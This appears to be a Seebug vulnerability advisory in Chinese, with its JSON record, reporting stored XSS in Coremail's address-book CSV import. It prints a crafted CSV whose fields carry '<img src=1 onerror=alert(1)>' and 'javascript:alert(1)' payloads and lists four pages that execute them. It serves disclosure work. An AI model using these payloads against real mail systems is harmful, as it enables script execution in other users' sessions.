ID SSV:94741
Type seebug
Reporter Root
Modified 2015-01-06T00:00:00
Description
简要描述:
漏洞还是得交乌云。
详细说明:
coremail在个人通讯录处可以导入联系人,格式为csv。
<img src="https://images.seebug.org/upload/201501/06151859d42791e1ad4cf5f545b14e12febd2e5c.jpg" alt="01.jpg" width="600" onerror="javascript:errimg(this);">
导入如下CSV:
联系组,姓名,电子邮件地址,住宅地址,住宅地址 邮政编码,住宅电话,移动电话,单位,商务地址,商务地址 邮政编码,商务电话,商务传真,生日,即时信息地址,网页,__cm_group
aa</textarea><img src=1 onerror=alert(1)>aaaaa,</textarea><img src=1 onerror=alert(1)>,</textarea><img src=1 onerror=alert(1)>@qq.com,,,,13132132132,<img src=1 onerror=alert(1)>,<img src=1 onerror=alert(1)>,,<img src=1 onerror=alert(1)>,,19881212,<img src=1 onerror=alert(1)>,javascript:alert(1)
,,,,,,,,,,,,,,,FRIENDS=<img src=1 onerror=alert(1)>
,,,,,,,,,,,,,,,FAMILY=<img src=1 onerror=alert(1)>
,,,,,,,,,,,,,,,COWORKERS=<img src=1 onerror=alert(1)>
,,,,,,,,,,,,,,,NETFRIENDS=网友
,,,,,,,,,,,,,,,VIP=重要联系人
可见主页面已经转义了,没有触发:
<img src="https://images.seebug.org/upload/201501/061520502dc102db7e51d63b6f3d9480c88a5c34.jpg" alt="02.jpg" width="600" onerror="javascript:errimg(this);">
但各个功能页面都存在触发的问题,列举如下:
1.新建联系组时触发:
<img src="https://images.seebug.org/upload/201501/06152844f9752692c7b32a4850bca83e4ab6cfa4.jpg" alt="08.jpg" width="600" onerror="javascript:errimg(this);">
<img src="https://images.seebug.org/upload/201501/0615230486304b27eb3bf9e914cfcd05cdce71c4.jpg" alt="03.jpg" width="600" onerror="javascript:errimg(this);">
2.打印联系人时触发:
<img src="https://images.seebug.org/upload/201501/061524361b7ae99ea4d1ce42cbbf797747868921.jpg" alt="04.jpg" width="600" onerror="javascript:errimg(this);">
<img src="https://images.seebug.org/upload/201501/0615252783c090ebc26355a0d358bd03a707a024.jpg" alt="05.jpg" width="600" onerror="javascript:errimg(this);">
3.编辑组时触发:
<img src="https://images.seebug.org/upload/201501/06152802a91b0282e0aa0cd0035f13ef98d68af4.jpg" alt="06.jpg" width="600" onerror="javascript:errimg(this);">
<img src="https://images.seebug.org/upload/201501/06152813553ed2a5f5bf7066f217c4ac265b2b95.jpg" alt="07.jpg" width="600" onerror="javascript:errimg(this);">
4.清空联系人邮件时触发:
<img src="https://images.seebug.org/upload/201501/06153120ab6cac00737986c8243b060409e05077.jpg" alt="09.jpg" width="600" onerror="javascript:errimg(this);">
<img src="https://images.seebug.org/upload/201501/06153129247a30e8bf60788ef1af560154e45f1f.jpg" alt="10.jpg" width="600" onerror="javascript:errimg(this);">
漏洞证明:
见详细说明。
{"type": "seebug", "lastseen": "2017-11-19T12:38:13", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "href": "https://www.seebug.org/vuldb/ssvid-94741", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "modified": "2015-01-06T00:00:00", "reporter": "Root", "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\n\n\u6f0f\u6d1e\u8fd8\u662f\u5f97\u4ea4\u4e4c\u4e91\u3002\n\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\n\ncoremail\u5728\u4e2a\u4eba\u901a\u8baf\u5f55\u5904\u53ef\u4ee5\u5bfc\u5165\u8054\u7cfb\u4eba\uff0c\u683c\u5f0f\u4e3acsv\u3002\n\n\n[<img src=\"https://images.seebug.org/upload/201501/06151859d42791e1ad4cf5f545b14e12febd2e5c.jpg\" alt=\"01.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201501/06151859d42791e1ad4cf5f545b14e12febd2e5c.jpg)\n\n\n\u5bfc\u5165\u5982\u4e0bCSV\uff1a\n\n\n```\n\u8054\u7cfb\u7ec4,\u59d3\u540d,\u7535\u5b50\u90ae\u4ef6\u5730\u5740,\u4f4f\u5b85\u5730\u5740,\u4f4f\u5b85\u5730\u5740 \u90ae\u653f\u7f16\u7801,\u4f4f\u5b85\u7535\u8bdd,\u79fb\u52a8\u7535\u8bdd,\u5355\u4f4d,\u5546\u52a1\u5730\u5740,\u5546\u52a1\u5730\u5740 \u90ae\u653f\u7f16\u7801,\u5546\u52a1\u7535\u8bdd,\u5546\u52a1\u4f20\u771f,\u751f\u65e5,\u5373\u65f6\u4fe1\u606f\u5730\u5740,\u7f51\u9875,__cm_group\naa</textarea><img src=1 onerror=alert(1)>aaaaa,</textarea><img src=1 onerror=alert(1)>,</textarea><img src=1 onerror=alert(1)>@qq.com,,,,13132132132,<img src=1 onerror=alert(1)>,<img src=1 onerror=alert(1)>,,<img src=1 onerror=alert(1)>,,19881212,<img src=1 onerror=alert(1)>,javascript:alert(1)\n,,,,,,,,,,,,,,,FRIENDS=<img src=1 onerror=alert(1)>\n,,,,,,,,,,,,,,,FAMILY=<img src=1 onerror=alert(1)>\n,,,,,,,,,,,,,,,COWORKERS=<img src=1 onerror=alert(1)>\n,,,,,,,,,,,,,,,NETFRIENDS=\u7f51\u53cb\n,,,,,,,,,,,,,,,VIP=\u91cd\u8981\u8054\u7cfb\u4eba\n```\n\n\n\u53ef\u89c1\u4e3b\u9875\u9762\u5df2\u7ecf\u8f6c\u4e49\u4e86\uff0c\u6ca1\u6709\u89e6\u53d1\uff1a\n\n\n[<img src=\"https://images.seebug.org/upload/201501/061520502dc102db7e51d63b6f3d9480c88a5c34.jpg\" alt=\"02.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201501/061520502dc102db7e51d63b6f3d9480c88a5c34.jpg)\n\n\n\u4f46\u5404\u4e2a\u529f\u80fd\u9875\u9762\u90fd\u5b58\u5728\u89e6\u53d1\u7684\u95ee\u9898\uff0c\u5217\u4e3e\u5982\u4e0b\uff1a\n1.\u65b0\u5efa\u8054\u7cfb\u7ec4\u65f6\u89e6\u53d1\uff1a\n\n\n[<img src=\"https://images.seebug.org/upload/201501/06152844f9752692c7b32a4850bca83e4ab6cfa4.jpg\" alt=\"08.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201501/06152844f9752692c7b32a4850bca83e4ab6cfa4.jpg)\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201501/0615230486304b27eb3bf9e914cfcd05cdce71c4.jpg\" alt=\"03.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201501/0615230486304b27eb3bf9e914cfcd05cdce71c4.jpg)\n\n\n2.\u6253\u5370\u8054\u7cfb\u4eba\u65f6\u89e6\u53d1\uff1a\n\n\n[<img src=\"https://images.seebug.org/upload/201501/061524361b7ae99ea4d1ce42cbbf797747868921.jpg\" alt=\"04.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201501/061524361b7ae99ea4d1ce42cbbf797747868921.jpg)\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201501/0615252783c090ebc26355a0d358bd03a707a024.jpg\" alt=\"05.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201501/0615252783c090ebc26355a0d358bd03a707a024.jpg)\n\n\n3.\u7f16\u8f91\u7ec4\u65f6\u89e6\u53d1\uff1a\n\n\n[<img src=\"https://images.seebug.org/upload/201501/06152802a91b0282e0aa0cd0035f13ef98d68af4.jpg\" alt=\"06.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201501/06152802a91b0282e0aa0cd0035f13ef98d68af4.jpg)\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201501/06152813553ed2a5f5bf7066f217c4ac265b2b95.jpg\" alt=\"07.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201501/06152813553ed2a5f5bf7066f217c4ac265b2b95.jpg)\n\n\n4.\u6e05\u7a7a\u8054\u7cfb\u4eba\u90ae\u4ef6\u65f6\u89e6\u53d1\uff1a\n\n\n[<img src=\"https://images.seebug.org/upload/201501/06153120ab6cac00737986c8243b060409e05077.jpg\" alt=\"09.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201501/06153120ab6cac00737986c8243b060409e05077.jpg)\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201501/06153129247a30e8bf60788ef1af560154e45f1f.jpg\" alt=\"10.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201501/06153129247a30e8bf60788ef1af560154e45f1f.jpg)\n\n \n\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a\n\n\u89c1\u8be6\u7ec6\u8bf4\u660e\u3002", "bulletinFamily": "exploit", "references": [], "objectVersion": "1.4", "viewCount": 0, "status": "details", "sourceHref": "", "cvelist": [], "enchantments_done": [], "title": "Coremail\u67d0\u529f\u80fd\u591a\u5904\u5b58\u50a8\u578bXSS", "id": "SSV:94741", "sourceData": "", "published": "2015-01-06T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 10.0}, "dependencies": {"references": [], "modified": "2017-11-19T12:38:13"}, "vulnersScore": 10.0}, "_object_type": "robots.models.seebug.SeebugBulletin"}
{}